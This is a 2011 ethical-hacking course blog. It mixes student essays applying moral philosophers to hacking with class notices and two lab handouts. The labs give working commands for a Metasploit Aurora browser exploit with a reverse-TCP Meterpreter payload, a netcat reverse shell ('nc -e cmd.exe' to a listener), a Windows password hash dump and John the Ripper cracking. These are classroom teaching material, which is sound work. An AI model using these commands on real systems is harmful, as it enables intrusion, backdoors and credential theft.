Thursday, December 15, 2011

Hackers and Moral Desert (not a sweet treat)

The concept of moral desert is a complicated one. Moral Desert states that a person is obligated to something because of something else (the dog gets a biscuit because he's been good), and that result can be either good or bad; the person must accept all consequences be they positive or negative. The actual theory is more complex and the Stanford Encyclopedia of Philosophy gives a much more in-depth explanation (trying to explain it fully here would go way over the maximum word count, so I'll just mention the site).

This theory was famously rejected by the philosopher John Rawls. Rawls claimed that a person's talents were simply the result of 'natural lottery' and so a given individual could not claim credit for and does not morally deserve the results of said talents (better job/salary, award, etc); he does clarify that while he does not accept the underlying concept of moral desert, people can and should expect to receive positive--and only positive-benefits from talent (he calls this 'Legitimate Expectation'). Where the legitimate expectation argument seems to fail is that it states that one only deserves to take credit for results if the individual or group expected them to happen, and the only results that count are positive.

In applying this concept to hacking, a person may not expect the results of an action but it happens anyway. Is it then moral to claim credit for those results? According to the basic moral desert framework, yes. In today's world where exploits can be found with a Google search and skill isn't necessarily required to make use of some powerful tools, not unless the person personalized the results in some way (tweaking source code and adding in a signature, adding a message to a defaced site, etc) so that everyone would know it was them. Hacking results are only claimed by an individual or group if the results are positive (when was the last time you heard of Anon, LulzSec or the like taking credit for a failure?).

When I was in high school, the 'IT department' (one librarian who believed anything on a computer worked exactly the way it was supposed to) used a fairly simple keyword filter with a bad bit of code. It blocked sites based on keywords with no context, resulting in students unable to do research assignments because the filter was blocking a lot of stuff it shouldn't.

I was able to get the password through simple shoulder-surfing (I was just curious and did not expect to be able to actually get the master password). So I disabled the filter when I had an in-class project that otherwise would have been impossible. One teacher saw me doing this and assumed IT had trusted me with the password; I later told her that was not the case. She asked how I got it; I told her, gave her the password, she gave it to a couple other teachers and students were happy. Everyone behaved (the students didn't directly have the password, only teachers) and there were no logs to check. This fails the 'legitimate expectation' argument that Rawls gives, as I used knowledge (not 'natural lottery') to gain these results, but I had no real expectation of being able to circumvent the filter. Nor did I expect or even want credit; I figured that the librarians would probably find some reason to ban me from the computer lab altogether if they found out.

Another possible example of the moral desert theory is the Harvard admissions hack. Prospective students replaced a character string in a URL, and thus were able to view their admissions status in advance. Could it be considered an 'immoral' advantage? Not knowing the whole story, I would think that it depends. If an applicant viewed only their own information while waiting for the letter to arrive in the mail, I would not see that as an unfair advantage as the outcome was already certain. Some might.

You could argue that the person who discovered this flaw in the system did not expect to gain access (the expectation is that databases like that with sensitive information are protected by a password or other barrier to entry from the outside), but we don't know if that is in fact the case. Once the info was published, everyone expected to get in, so that might fall under 'legitimate expectation' (however wrong it may be). However, anyone using the hack must be prepared for the negative consequences as well as the possible positives (moral desert).

John Stuart Mill and Jeremy Bentham - Enjoy the occasional hack.

What would John Stuart Mill and Jeremy Benetham say about hacking?

An interesting idea, and certainly one worth taking a look at. For this blog post, I am focusing on two of the strongest driving forces behind the ideas of Utilitarianism. Utilitarianism is the idea that the proper action, the moral action, is the one that maximizes overall happiness. Benetham states that there are two “soverign masters” governing mankind, pain and pleasure, and Benetham believes that the proper action would be one that maximizes overall pleasure, while minimizes overall pain. This concept stems from the idea of consequentialism, which states that the morality of an action can be determined only from the outcome of said action. This differs from Kant’s idea of categorical imperative, which can be summed up by saying that some actions, regardless of outcome, are moral or immoral. To really get an idea of these concepts in action, let me employ a lovely example I came across in one of Michael Sandel’s lectures.


Imagine you’re walking along a bridge and you spot a runaway train; It’s zooming along the track, the breaks don’t work, and Denzel Washington is nowhere to be found(If you don’t understand the joke, don’t be discouraged. I assure you it wasn’t that funny anyway). A good distance down the track are five unaware train workers, doing train worker things to the track. Imagine that it is inevitable - if nothing is done, these five train workers are going to die miserable, painful deaths. Now, imagine on that very bridge, a incredibly large man is leaning over the railing directly above the train’s track. You realize that you can save all five of those train workers lives if you just push the large man over the railing, and onto the track. This incredibly large man would inevitably die a most unfortunate death, but in the process he will have saved five other peoples lives. So what do you do - Do you choose send one man to his death to save five people, or do you choose to let the train kill the five workers and let the fat man lean against the railing in peace?

The utilitarianist would keep it simple and state that five lives without pain and one life with pain is better than five lives with pain and one without pain, and without much hesitation, send the fat man plummeting to his inevitable end. Obviously, somebody who follows Kant’s idea of categorical imperative would let the five men die, because regardless of whether 5 men die or 1 man dies, this philosophy states that sending a man to his death is, without question, immoral, and thus the wrong decision.

So now that we know how the Benetham and Stuart Mill would act in that scenario, what can be assume about their stances on hacking? I believe that both of these gentlemen would support hacking as long as it follows the basic tenants of utilitarianism -- there must be more overall happiness after the hacking than before. Let’s delve into a few scenarios and see the stances they’d take.

Would Benetham/StuartMills be okay with hacking into somebody’s wireless network? It depends - if the hacker isn’t in any way infringing on the owner’s speeds, or data privacy, I don’t think they would have a problem with this. Pleasure is gained from free Internet, and if the owner’s experience does not change post-hack, he/she does not feel any pain. If you take a step further, it might be argued that the people who profit from the Internet service provider’s income may suffer, so depending on how much the ISP stands to lose from this hack, Benetham and co. might not approve of the hack.

Would Benetham and co. approve of hacking a child pornography website? Absolutely. Without a doubt these people would view distributors and producers of child pornography and incredible sources of pain for children and families, and to prevent them from creating any more pain, thus minimizing pain and increasing overall happiness, they would hack the website (Stuart Mill has 1337 h@ck3R sk1llz, afterall).


And for my final example, would BeneMills approve of hacking Microcenter’s website because he doesn’t like their prices and the manager was a big jerk to him? I believe they would not - they would see that while it may produce a considerable (very, very, very considerable) amount of pleasure for the hacker, it would cause much more pain for customers, workers, and anybody who stands to profit from the website’s operation.


In conclusion, I believe that our friends Benetham and Stuart Mills would approve of hacking - but only after they have analyzed the resulting outcome of said hacks.

Oops!

In my half-awake stupor I forgot to thank both Jamie and Monica for taking us out to lunch. It was awesome and much appreciated. So thank you guys, and thanks for making the class enjoyable and engaging!

John Rawls is Anonymous

John Rawls believed that the greatness your future may or not behold stems solely from the things you were taught and the talents you were given at birth, and as a child. John Rawls philosophy is that even with meritocracy you will never be put ahead of someone who is naturally talented. You were either born into a family that raised you to be successful or you were not. However, John Rawls mentions that even those who are naturally talented can not claim credit because there success may rely on factors such as birth order.

John Rawls also thought that being paid insane amounts of money to do something you were born talented at is unfair. Unless you were using some of that money to give back to the people who lack talent in such things. For instance in the lecture they mentioned the salary of supreme court judge Sandra Day O’Connor ($200,000) with the salary of television’s Judge Judy ($25 million). To no surprise, John Rawls would not approve of the pay difference. When I heard John Rawls's take on Greed an wealth of the talented people, It made me think about what his opinion would be toward the current actions of anonymous. I wonder if he were still alive, if he would reject the protesting or support it. Based off what I learned from the lecture, I think John Rawls would want to take part in the protesting and would support the occupy groups. John Rawls was most likely ashamed by present day America with all the overpaid athletes and bone head celebrities. Although, in many instances his theories prove correct. The rich are richer and the poor are getting poorer.

However, I believe that groups such as Anonymous would give John Rawls hope, and maybe even put his theories to the test. Anonymous is a public group of secret members, who claim to be activists for freedom and truth. They claim to be ideas without origin. It started with image board in japan. Then they created an image board in English (4chan).Where Anonymous only grew in numbers. Annonymous as I mentioned is public and completely diverse. Holding member of various skill sets, though some are childlike and immature, there are also educated and skilled members. Anonymous has been know for actions such as stealing private information, and taking down inappropriate websites for justice. I don't fully agree with the idea that hard work will never compare to natural talent. Also, the idea that people who come from impoverished families should be given charity by wealthy families. In most cases that theory may hold truth, but not all. I think John Rawls needed to put more faith in the underdog.

I personally think John Rawls would be proud of the current cover of Time magazine.(Person of the year: The Protester) I feel John Rawls almost thought of life as a race, It all depends on where you start that determines the outcome of how far you will go. That's why I believe he would be proud of the “underdogs” for fighting against the greed and ridiculous wealth that belong to a select few. John Rawls seemed like he was all about the idea that the talented and wealthy can have tons of money, as long as they help the less fortunate. Many wealthy American do give back to the community by giving to charities, but there are also many wealthy people who could care less. I am not sure how John Rawls would feel about all the hacking anonymous does.

In conclusion, John Rawls believed that the success in your life is determined by your beginning and that no matter how hard you work the person with the “easier” beginning, or farther start will end up ahead of you. Which I do not believe. Also, John Rawls believed that natural talent was more efficient than motivation and effort. John Rawls also believed that the wealthy should have to give some of their money to the less fortunate, because they can not take credit for their natural talent. I mentioned that I personally believed John Rawls would find anonymous and the occupy groups intriguing, because they are joining together to fix what they see as wrong in the world.

Aristotle and Anonymous

The hacker ethic is closely related to the virtue ethics found in the writings of Aristotle. Aristotle’s Nicomachean Ethics suggests there is an ultimate good toward which, in the end, all human actions ultimately aim. Virtue Ethics refers to the philosophy that emphasizes being, rather than doing. This means that morality stems from the how a person identifies his/her motivations for the action, and the character inherent in that person, and not from actions of that person alone. Ethical choices and examination must be made in each individual situation, based on factors such as personal vs social(group) benefit, and what intentions are present in the person(s) …are they well meant or malevolent?. Anonymous is a complex example to examine because by it’s very nature, it consists of a group of persons of unknown identity, who, despite claiming altruistic intention, may in truth be carrying out actions that benefit a smaller chosen group, although they claim to seek justice for others…or they may be as they seem. In truth, that may fluctuate at every moment, as it is a “many” and not a “one”.

Anonymous was formed on the imageboard 4chan, primarily a place to chat and post images and rambling text (often incoherent or offensive…at this point I’d like to shout out to the /b/tards!). They act at times like a hive mind with no openly recognized leaders, choosing to encourage and inspire group action under an anonymous fictional figurehead (as shown by their logo, a suited figure without a head, instead there is only a question mark, standing in a stance of authority in front of a globe). Starting somewhere around 2006, members of this collective have collaborated through anonymous Internet Relay Chat (IRC), where they communicate in group chats, send each other private messages. There is also the capability to exchange files via FTP/file transfers via IRC. IRC creates a decentralized “war room” in which ideas are exchanged, agreements are made as a group, and plans may be deployed. Actions that follow include DDoD attacks , the public posting of group information mining efforts, exposing as muany details as possible to the public eye about offending groups, people or corporations, including security flaws and exploits of websites that may be used by any and all, to create further breaches and attacks. The factor of anonymity and the group collective effort of many (“We are Legion”, they proclaim), can have strong influence on certain social groups in today’s society.

The idea that Anonymous represents is ethical. They represent a symbolic figurehead, an inspiration and identification symbol by which to organize actions with intent towards acts of activism via hacking, or “hackivism”. Individuals within the whole collective operates in a non-centralized, collective manner that insists on overall agreement in order for such action to succeed despite any petty differences or disagreements, with members working together in order to accomplish set goals. In addition, they put out the call for others to join, adding further strength in numbers. But the question is - is crashing a website, or denying people access to the information or function of it, a morally justified means of protest? Is putting the personal information of a person who has committed a perceived wrong out there helpful? I bring up the case of the “pepper spray cop”, John Pike…are the efforts of publishing his information, that result in lots of pizza, male escorts and such being sent to his home, that he shares with a family who are not at fault, worth it as a form of protest? Is it worth it if only to shame HIS unethical behavior, and do we consider the demoralizing effect this may have on innocent members of his family? In John Pike’s case alone, Aristotle would argue for Distributive Justice…in essence, that people should get what they deserve. In Pikes case, it could be argued that he “deserves” less respect, authority, and dignity or pride. Certainly it can be said, that despite the resulting actions being petty, that they strip away his dignity and lower the reflection upon him of those traits I have just mentioned. When considering this protest, or any other, the moral reasoning of the protest should be examined. If that action is deemed to NOT fit in the reasoning, and instead commits a wrong to the target by way of the action, then that act of protest should seem morally wrong. Aristotle’s virtue ethical theory only focuses only upon the agent of the chosen action. The actions of a single individual in such an act of protest, compared to the relative morality of the rest of the world, may not be considered ethical, but the scale of justice shifts when it is a mass, faceless collective. It becomes easy to understand them as the Everyman. This gains sympathy – who doesn’t want to see a “bad guy” come to his just desserts, after all?

Wednesday, December 14, 2011

Ethics Blog Post (Exactly 800 Words)

John Locke (even though I disagree with John Locke on many
issues I agree with natural rights) was a 17th century Philosophy
that influenced many other social thinkers, political philosophers, economic
theories from all walks of the spectrum. His theory’s can be applied to a
concept that he wouldn’t be so far from, property rights in the modern era.

Property rights in the modern age seem to be dwindling, and
no I’m not talking “Me Hate Taxes, Taxes Bad GRR”, I’m talking with modern day
electronic devices and digital content where the concept of ownership seems to
becoming less than that of the Native Americans. Where and when will people
finally see that when you buy an electronic device where you can only do
certain things with it “or else” that you don’t really own a product, you are
merely leasing it? It’ll probably be where you can’t just smash the device with
a shovel for being an ineffective piece of shit without having the manufacture
suing you for improper use. EULA’s are turning purchases into leases,
destroying property rights.

Take the Sony case, for an example, where a jail breaking (modifying)
a Playstation and telling people how to do it could bring on a lawsuit. This
brought an outrage in me that if I rented a car and caused damaged to it or
modified it against their wishes, the rent-a-car company could bring a lawsuit
against me and would be completely just in doing so. But if I bought a car and
modified it the car salesman or even the car manufacture could not sue me. John
Locke claimed before and would claim today that a civil society was created for
the protection of property. Property what is one’s own. That even in the sense
of the law (as in if someone broke into my house they would be stealing my PS3,
not Sony’s PS3) I would own that Playstation but I could not modify it; even
without causing real harm to others, that I could be punished for my actions.

Yes, companies deserve say in what you do with your product
ON THEIR systems, just like the state has a say in what you can drive on public
roads, and a store has a say in what they will sell. Sony could ban any user
that jailbreaks their PS3 from the Playstation network without anyone’s
property rights truly being infringed upon. This all falls under natural rights;
John Locke could comparatively see this action to another action in his time
such as a traded horse with a contract to the new owner that as long as the new
owner does not needlessly beat the horse he could ride the horse on trader’s
property, but if the new owner needlessly beats his horse he no longer can ride
his horse on the trader’s property.

Digital content isn’t owned, it is rented with a onetime fee.
And I’m not talking about copyrights; people deserve credit and payment for
their work, I’m talking purchased digital content where your ownership be
revoked for as simple a reason as they sold it to you for a couple dollars less
than they should have. Yes, I am referring to the Kindle books that were deleted
from people’s Kindle’s by Amazon (Ironically it happened to books by George
Orwell, Animal Farm and 1984, among others) after they had already paid for the
book. This wouldn’t happen in John Locke’s time and comparatively John Locke
would see this as a giant abridgment of property rights, ones labor exchanged for
value, and that value traded for goods then become one’s property.

Imagine a scene like this occurring in John Locke’s time,
John Locke purchases a book for 10 shillings, he reads it, enjoys it and when
he is halfway through the man that sold him the book runs up to him, takes the
book right out of his hands and gives back the 10 shillings (for one of many
various reasons sold too cheaply, wasn’t an authorized version etc.) which went
completely outside of the agreement the men had (Amazon’s ToS). With the
government sitting idly, by just allowing this to occur wouldn’t truly be an
ideal society or a Civil Society.

Property in the digital age is truly becoming a dying concept;
the day will come where true ownership of electronic devices and of property on
digital devices becomes a thing of the past, where you do not own an object,
you just paid a onetime fee to be allowed to use it. That is the future we face
unless we extend current property rights protections to digital content and
electronic devices.

OOOO Nooooooo, I am currently not at exactly eight hundred words;
I now only have two more words to write right now.

Screw Flanders.

Tuesday, December 13, 2011

Thursday 12/15!

Meet at Chow Thai Cafe at 2:00 PM! Yes, 2:00! If you can't come until 2:30, fiiiiine, we'll start having fun without you.

Make sure you make your final ethics blog post by 11:59 on Thursday. This is more than half of your ethics grade for the course; as a result this is more than 1/6 of your TOTAL final grade for the course. SO DO THE %$#%(% PROJECT!

Monday, December 12, 2011

Last Call....

It is officially the LAST week of classes, and as such I am reminding you that ANY homework assignments you might have missed that are "past due" you should submit by this Thursday, December 15 to recieve any credit. 

Project 10 we completed in class last week, so if you were in class, you got credit for it.  If you missed that class, you will need to complete it on your own and send me a screenshot to receive credit. 

Project 11 builds on 10 and is due on Thursday!

Reminder: The test on Chapters 11, 12, and 13 will be tomorrow in class!

Ethics blog

Philosopher Immanuel Kant introduced some interesting characteristics of freedom, necessity, justice and right. The word freedom is a powerful word revolving around free will and choice. Necessity can be based on an act performed in order to prevent a greater evil or harm. What about the Justice in an act that constitutes fairness and is there a moral right revolving in such an act?

My ethical hacking term will be based on two computer worm viruses, Stuxnet and Suter. We all know that malicious viruses can create havoc on computer systems by stealing our data, corrupting our software and just causing a big friggin headache! But what if a virus such as Stuxnet and Suter can be used for ethical purposes? A good example would be launching one of these viruses against so called “rogue nations” who are seeking to build nuclear weapons for their evil intentions.

In September of 2007, Israel launched an air strike in Syria that demolished a suspected nuclear plant. Israeli fighter jets were able to cross into Syria undetected due to a virus called Suter, executed by Israel which immobilized Syrian radar defenses. A few years later sometime around November of 2010, Stuxnet was launched against Iran. This virus was used against the Iranian's Natanz nuclear facility plant, which destroyed at least one thousand of their centrifuges. Stuxnet was not only successful in disrupting Iran's nuclear power plant, but this attack is said to also delay Iran's capability in building a nuclear weapon.

So there’s no question a malicious virus that we once thought to be a threat against our computerized systems, may one day become a savior in dismantling a hostile nation's network and there by disrupting their nuclear weapons plant.

Now we come to the question on whether or not Stuxnet and Suter were morally right from an ethics point of few. What gives an act its moral worth? Does moral worth of an action depend on a motive as in doing the right thing for the right reasons? Was there any justice in sabotaging another country’s computer network? Does the word necessity come into play with a distinct argument that suggests that these viruses were necessary in order to prevent future evil that may one day create unimaginable harm?

We certainly can not predict the future and some will argue that mere assumptions may not be so valid to constitute such a right to deliver a virus attack against other countries. But is it best to be safe than sorry? Do we sit back and wait to see Iran’s true intentions of nuclear capability? If so, will we regret later on by not taking the necessary form of action to prevent their use of nuclear weapons? Is it morally right in creating viruses for the purpose of good when we have always dubbed viruses as malicious code? I guess it all depends on the situation.

Take for example an unethical incident in the country of Estonia, in 2007 that country was literally shut down by an unknown virus code. The virus took down the country's government web sites, banks and other financial firms. This attack is speculated to originate from Russia after a controversial debate on relocating a Soviet era monument within Estonia. Was this virus morally and ethically right over a statue? If so, I see no justice to shut down a peaceful country who wanted to forget the darkness of communism that once reined on its sovereignty. Perhaps our comrades had too much vodka and took it overboard?

Regardless, it is possible that malicious code may very well become helpful in dealing with future 21st century technological threats. The creation of such a virus in my opinion certainly has an ironic twist to it and we need to analyze that from certain perspectives. The use of such a virus may now have some good intentions towards preventing something drastic in the near future. One may call it a necessity.

I believe we will witness an extraordinary event involving a virus, which will help save millions or perhaps billions of lives around the world. When it comes to the word virus, we immediately think of a malicious code with potential destruction. But what we really should be asking ourselves is, is it morally and ethically right to launch a virus for good intentions and if so, will it have a moral worth to it? Again, will that moral worth of an act have some kind of motive towards doing the right thing and for the right reasons in hopes of preventing a greater harm from rogue nations? Only time will tell, great philosopher Immanuel Kant once said “So act that your principle of action might safely be made a law for the whole world.”

Saturday, December 10, 2011

Scams

There's a show on History Channel (HD feed; not sure if it's also on the standard version) right now about assorted scams, how they play out and how/why people fall for them.

Tuesday, December 6, 2011

Give this one a try.

Want to work for British intelligence? All you have to do is crack the code.

http://canyoucrackit.co.uk/index.asp

Scammers work around two-factor authentication

http://slashdot.org/story/11/12/06/0321250/scammers-work-around-two-factor-authentication-with-social-engineering

Not all that surprising, given how lax some people can be with internet securification...

Thursday, December 1, 2011

Chapter assignments!

Don't forget: you're asked to present on one of the chapters on Thursday!

Here is the list of who will present on which chapter:

Chapter 11: Rob, Karl, Joe
Chapter 12: Marie, Isabel, Sean
Chapter 13: Orlando, Vinny, Corey

sodqv

Phhw dw fkrz wkdl fdih iru oxqfk rq ghf 48.

Overheard in Ethical Hacking

"The smiley face is an L."

L, for I effing Love this class. Thanks for letting me play and learn with you real computer people this semester.

of interest, and a damn good read

Cryptonomicon by Neal Stephenson

One of my favorite authors, and a great book. Also, related to the topic!

Project 11 - Setting Up a Reverse Shell, Dumping Passwords, and Cracking Passwords

 Using Netcat to Set Up a Reverse Shell

Exercise 1: using Netcat for a reverse shell: in the following exercise, you will use the Meterpreter payload from the previous lab to set up a Netcat listener (AKA reverse shell). This will allow you to remotely control the target system after you close your Meterpreter session and thus, come back to the target system whenever you want:
1. The first step in setting up a Netcat listener is to get the Netcat executable on the target system so it can be used to interact with your attack system. There are a number of ways this can be accomplished. You’ll use Trivial File Transfer Protocol (TFTP) to copy the Netcat executable from your BackTrack system to the target system

2. In the bottom left of your BackTrack desktop, click the dragon-looking icon/Services/TFTPD/Start TFTPD. This will start the TFTP daemon (or server service) on your BackTrack system. You should get a message that the TFTPD is running on port 69 and the home directory is /tmp. Click the OK button

3. You are now going to copy the Netcat executable from its default location (/pentest/windows_binaries/tools) to the /tmp directory on your BackTrack system so it can be TFTPed down from the target system. To do so, open a new shell (leave the current Meterpreter shell open) and type the following (only type what’s in bold):
user1@pentest:~#cp /pentest/windows-binaries/tools/nc.exe /tmp

4. Change into the /tmp directory and list the contents of this directory (only type what’s in bold):
user1@pentest:~#cd /tmp
user1@pentest:~#ls -al
Look for the nc.exe file in this directory

5. Leave this shell open

6. Go to the Meterpreter shell you left open. At the Windows command shell prompt, type the following (only type what’s in bold):
C:\WINDOWS\system32>tftp -i BackTrack_IP_address get nc.exe
Syntax breakdown:
tftp: program name
-i: specifies the binary image transfer mode (which means to move the binary file byte by byte)
BackTrack_IP_address: IP address of your BackTrack system
get nc.exe: transfers the nc.exe file from your BackTrack system to the target system
If the file transfer was successful, you should see a message similar to this: “Transfer successful: 59392 bytes in 1 second, 59392 bytes/s”

7. Now you will set up both the client and server portions of the backdoor

8. In the second shell you opened in step #3 (not the Meterpreter shell), start the Netcat program on your BackTrack system in listening mode (server mode) by typing the following (only type what’s in bold):
user1@pentest:~#nc -v -l -p 3333
Syntax breakdown:
nc: program name
-v: verbose mode
-l: listen mode (listen for inbound connections)
-p 3333: local listening port on the BackTrack system

9. From the Meterpreter shell (where you have the Windows command shell prompt open on the target system), start the client side of the Netcat backdoor (only type what’s in bold, on one line):
C:\WINDOWS\system32>nc -e cmd.exe BackTrack_IP_address 3333
Syntax breakdown:
nc: program name
-e cmd.exe: inbound program to execute
BackTrack_IP_address 3333: your BackTrack system’s IP address and listening port for incoming connections
This will shovel a Windows command shell from the target system to your BackTrack system, appearing in the non-Meterpreter shell you opened in step #3

10. Close the Meterpreter shell window (click the X in the upper-right corner of the window)

11. Notice your BackTrack prompt has turned into a Windows command shell prompt. You now have a backdoor into the target system

12. Type (only type what’s in bold):
C:\WINDOWS\system32>dir nc.exe

13. Leave your Netcat listener shell open

Exercise 2: Using Meterpreter to Dump Windows Password Hashes
 Using Meterpreter to Dump Windows Password Hashes: in the following exercise, you will use the built-in capability of the Meterpreter payload to dump the password hashes of the accounts on your target system. These hashes will be used later in password cracking attempts, with the ultimate goal of getting additional usernames and passwords:

1. Close your reverse shell and return to the Meterpreter prompt (only type what’s in bold):
C:\WINDOWS\system32>exit

2. With a Meterpreter shell in place type (only type what’s in bold):
meterpreter > hashdump

3. The contents of the target system’s password hash file are output to the screen.
The passwd file contains user account information and looks as follows:
Administrator:500:CEEB0FA9F240C200417EAF40CFAC29C3:D280553F0103F2E643406517296E7582:::
User1:1011:7584248B8D2C9F9EAAD3B435B51404EE:186CB09181E2C2ECAAC768C47C729904:::
User2:1012:AC5BA6A944526699AAD3B435B51404EE:F07A9DFFFC2C5C7F9D9EBC83FD69D68E:::
User3:1013:E7EED3F5C2C85B88AAD3B435B51404EE:6AA15B3D14492D3FA4AA7C5E9CDC0E6A:::
Each field is separated with colon. The fields are:
 1st field: username (Administrator, User1, etc.)
 2nd field: Relative Identification (RID): last 3-4 digits of the Security Identifier (SID), which are unique to each user
 3rd field: LM hash
 4th field: NTLM hash

4. Based on previous lab techniques, determine a way to get the contents of the hashdump output from your BackTrack system to your Windows attack system

5. Save the file as hashes.txt to the c:\temp drive on your Windows attack system

Exercise 3: Cracking Windows Password Hashes Using John the Ripper
John the Ripper is a fast password cracker, currently available for many flavors of *NIX, DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak passwords. In the rest of this lab, John the Ripper will be referred to as John.  In the following exercise, you will use the command-line version of John to crack the LM password hashes from your target system:

1. Get the password hashes from your target system to your BackTrack system, saving them in /root/ceh, in a file called hashes.txt

2. Change into the directory where John is located (only type what’s in bold):
user1@pentest:~#cd /pentest/passwords/jtr
user1@pentest:~#pwd
/pentest/passwords/jtr

3. Type (only type what’s in bold):
user1@pentest:~#./john /root/ceh/hashes.txt
Syntax breakdown:
./john: program name
/root/ceh/hashes.txt: the password hashes from your target system
Your output will look something like this:
Loaded x password hashes with no different salts (NT LM DES [32/32 BS])
PACHYDE (smendez?e?:1)
RM (smendez?e?:2)
guesses: x time: 0:00:08:23 100% c/s: 9204K trying: ZYUUZOK - ZZZZZZZ

4. In a second BackTrack shell, use the --show option to display the password cracking status (only type what’s in bold):
user1@pentest:~#./john --show /root/ceh/hashes.txt | less

NOTE: you will need to re-run this command multiple times to get the latest information relating to cracked passwords and remaining hashes left to crack

Project 10 - Browser Exploit Using Metasploit

In the following exercise, you will use Metasploit from the BackTrack distribution to deliver an exploit to a vulnerable version of Internet Explorer:

1. From a BackTrack shell, navigate to the Metasploit Framework 3 folder (only type what’s in bold):
user1@pentest:~# cd /pentest/exploits/framework3
user1@pentest:~# pwd
/pentest/exploits/framework3

2. Open the Metasploit Framework console (only type what’s in bold):
user1@pentest:~# ./msfconsole

3. You are now going to setup Metasploit to use the Aurora exploit, made famous in December, 2009, when Chinese hackers launched this malware (and a host of others) against Google and 35 other multinational companies (only type what’s in bold):
msf > use windows/browser/ms10_002_aurora

4. Set the IP address of your BackTrack system, which will run a web server hosting the exploit (only type what’s in bold):
msf exploit (ms10_002_aurora) > set SRVHOST BackTrack_IP_Address
SRVHOST => BackTrack IP Address

5. Next, set the Meterpreter payload to launch a reverse shell once the victim visits the web server being hosted on your BackTrack system (only type what’s in bold, on one line):
msf exploit (ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

6. Set the following option for the Meterpreter payload (only type what’s in bold):
msf exploit (ms10_002_aurora) > set LHOST BackTrack_IP_Address
LHOST => BackTrack IP Address

7. You are now ready to launch the exploit (only type what’s in bold):
msf exploit (ms10_002_aurora) > exploit

Your output should look as follows:
[*] Exploit running as background job.
[*] Started reverse handler on BackTrack_IP_Address:4444
[*] Using URL: http://BackTrack_IP_Address:8080/text_string - select and copy the URL being outputted here
[*] Server started.
msf exploit (ms10_002_aurora) >

8. Leave this shell open - you will return to it shortly

9. Log into your Victim Windows system

10. Open Internet Explorer

11. Paste the URL from step #7 into the address bar and hit ENTER

12. Switch back to your BackTrack system
You should see the following output:
[*] Sending Internet Explorer “Aurora” Memory Corruption to client Windows_Victim_IP_Address
[*] Sending stage (749056 bytes) to Windows_Victim_IP_Address
[*] Meterpreter session 1 opened (BackTrack_IP_Address:4444 -> Windows_Victim_IP_Address:Port #) at
Day, Date Time
Note: you need to hit ENTER to get your Metasploit shell back

13. Type the following (only type what’s in bold):
msf exploit (ms10_002_aurora) > sessions -i x (where x is the Channel number in the output in step #12)
[*] Starting interaction with 1…
meterpreter >

14. Open a Windows command shell through the Meterpreter shell

Chapters 11, 12, 13 Homework

Chapter 11 - Activities 11.1 - 11.3
Chapter 12 - Activities 12.2, 12.4, 12.5
Chapter 13 -  Activities 13.1 - 13.3

Screen shots for these are due next Thursday, December 8.




A story about frequency recognition code breaking

The Gold Bug, by Edgar Allan Poe

Final ethics blog post! (Due 12/15)

Please create a NEW POST on the blog of 700-800 words *PRECISELY*. Not longer, not shorter. Make it engaging, analytically sophisticated, and concise.



In your post, you will apply the skills of ethical analysis you've learned to create a piece of writing that contributes to the internet discourse on the ethics of hacking. You are writing for a real audience, and you are contributing to a 21st century debate that is dearly in need of attention from smart peoples who are skilled in thinking about both hacking and philosophy.



Choose one of the episodes by Michael Sandel on http://www.justiceharvard.org/watch/ I don't recommend the first or last ones; any of the others could work well.



Watch the lecture. :)



Think about the lecture. Generally, Sandel will introduce a political or moral philosopher, like Aristotle, Kant, Rawls, or Locke, and apply the philosopher's ideas to situations.



Those situations will generally not have anything to do with computers. This is a shortcoming in our 21st century world.



You can ameliorate this problem. Apply the ideas in the lecture of your choice--ideas like utilitarianism, rights, moral desert, loyalty, etc.--to a problem or case of your choice in computer hacking. What would John Stuart Mill say about wardriving? What would John Rawls say about jailbreaking? What would John Locke say about replacing the characters in a URL and seeing what you get? What would Immanuel Kant (look, he's not named John!) say about doing that thing where you use web forms to SQLeeze your way into databases?



Don't forget to briefly introduce your philosopher and your hacking idea before you connect them. Readers will happen upon your post via Google, so you want to give them a bit of an introduction so they're not flying bling.



Make sure your ideas are analytically sophisticated--that would go without saying. But ideas are only part of the battle. Don't forget to express your ideas in an attractive and engaging and concise way. Wit, humor, beautiful writing--all these are great ways to engage your readers. Think about your favorite serious bloggers or op-ed--that's the sort of tone you want.

Codebreaking

Find out about codemaking, codebreaking.

Cryptography.

Frequency analysis.

Cipher texts.

Caesarean shifts.

Enigma.

These are words that matter for codebreaking.


Copywrong?

Y'all are hacker-types.

And while hacker-types and pirate-types are definitely not coterminous categories, piracy and hacking are closely connected. The Observant Commuter drew our attention to this several posts back.

Which brings us to the question of copyright.

Books, music, movies, software, drugs--all these can be and are copyrighted.

Does copyright undermine or increase creativity? Does pirated software infringe on property rights? And if so, how so? Does the blame lie with the person who uploaded a file to a torrent site, the person who downloads and benefits from it, or both--and why? Is copyright defensible in theory, but is the 21st century way of doing copyright a step too far? What do you think? Please create a comment on this post, no later than 12/6 at 1:00 PM (AKA Captain Seafoam Green's breakfast hour).


Some things to think with:


A theoretically-sophisticated argument that copyright is not justifiable in its current form:


http://www.tomgpalmer.com/wp-content/uploads/papers/morallyjustified.pdf


Two simpler perspectives on intellectual property:


http://www.stephankinsella.com/wp-content/uploads/publications/InsightMag_com_symp_printable.htm


About piratebay


http://en.wikipedia.org/wiki/The_Pirate_Bay








A movie (one hour long)





Steal This Film